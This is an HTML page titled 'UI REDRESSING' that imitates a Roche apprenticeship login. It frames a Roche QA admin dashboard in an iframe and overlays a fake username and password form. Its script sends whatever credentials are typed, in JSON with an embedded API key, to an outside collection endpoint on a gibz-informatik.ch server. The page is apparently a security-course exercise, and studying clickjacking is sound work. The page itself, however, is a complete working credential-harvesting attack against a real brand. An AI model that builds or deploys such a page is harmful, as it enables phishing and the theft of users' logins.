<!DOCTYPE html>
<html>
<head>
<title>UI REDRESSING</title>
<link rel="stylesheet" href=".\style.css">
<head>
<script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script><script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-140533014-1"></script>

    
    
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

    <title>Login | lehre.roche.com</title>

    <script src="https://fonts.roche.com/tta8okv.js"></script>
    <style type="text/css">.tk-minion-pro{font-family:"minion-pro",serif;}.tk-imago-pro-roche{font-family:"imago-pro-roche",sans-serif;}</style><link rel="stylesheet" href="https://fonts.roche.com/k/c/tta8okv-l.css" media="all"><script>try{Typekit.load();}catch(e){}</script>

    <link rel="stylesheet" href="/css/roche-icon-font.css">
    <link rel="stylesheet" href="./roche.css">
    <link rel="stylesheet" href="/css/datepicker.css">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.2/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous">    
    
<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/angular_material/1.1.12/angular-material.min.css">
    
    
  <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.7.6/angular.min.js"></script>
  <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.7.6/angular-animate.min.js"></script>
  <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.7.6/angular-aria.min.js"></script>
  <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.7.6/angular-messages.min.js"></script>
  <script src="/js/angular-base64-upload.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/angular-i18n/1.7.7/angular-locale_de-ch.min.js"></script>
  <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.10.6/moment-with-locales.min.js"></script>

  
  <script src="https://ajax.googleapis.com/ajax/libs/angular_material/1.1.12/angular-material.min.js"></script>

  <script src="https://code.jquery.com/jquery-3.1.0.min.js" integrity="sha256-cCueBR6CsyA4/9szpPfrX3s49M9vUU5BgtiJj06wt/s=" crossorigin="anonymous"></script>
      
  <script src="https://cdnjs.cloudflare.com/ajax/libs/FitText.js/1.2.0/jquery.fittext.min.js"></script>

  

<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>

</head>
<body>

    <iframe src="https://qa-berufslehre-rotkreuz.roche.com/systemdateien/admin/dashboard" frameBorder="0" title="UI REDRESSING"></iframe>

    <div id="login">
        <fieldset>
            <form method=POST action="https://qa-berufslehre-rotkreuz.roche.com/systemdateien/admin/dashboard">


                <legend>Login</legend>
                
                
                
                <label for="loginModel_Username">Username</label>
                <input data-val="true" data-val-required="The Username field is required." id="loginModel_Username" name="loginModel.Username" type="text" value="">
                <span class="field-validation-valid" data-valmsg-for="loginModel.Username" data-valmsg-replace="true"></span>
                <br>
                
                <label for="loginModel_Password">Password</label>
                <input data-val="true" data-val-length="The field Password must be a string with a maximum length of 256." data-val-length-max="256" data-val-required="The Password field is required." id="loginModel_Password" name="loginModel.Password" type="password">
                <span class="field-validation-valid" data-valmsg-for="loginModel.Password" data-valmsg-replace="true"></span>
                <br>
                <input type="hidden" name="ufprt" id="ufprt" value="E6BCBF52D62E119FF4440278711561A111C769785226575F596B37394634998D14A955A9F65DE4E53A0019008EB14B9E11F5A6A951C6F457767B1F78F19655763B78D529493EC74FFA2A49AF6D28C3B55B7B71EF21450BC8E8881F21D9B45EBF7998F82C0014FF94CCD0105FE9605C83734E706EAE001E78808C5B2AFCE5FF45C914665328549FE957EC1D26DF78C7C0">
                <button onclick="sendLogin()">Login</button>
            </form>
        </fieldset>
    </div>




    <script>
    
        function sendLogin(){
            

            const payload = {
            "username": document.getElementById('loginModel_Username').value,
            "password": document.getElementById('loginModel_Password').value
            };
                fetch('https://m183.gibz-informatik.ch/api/uiredresscredential', {
                    method: 'POST',
                    headers: {
                    'Content-Type': 'application/json',
                    'X-Api-Key': 'MwA2ADEANQA1ADkANgAwADQAMQA4ADQAMgAzADQAOAAwADIA',
                    },
                    body: JSON.stringify(payload),
                });
    
            console.log("data sent: ", payload);
        }
        
    
        
            
        
    </script>
</body>
</html>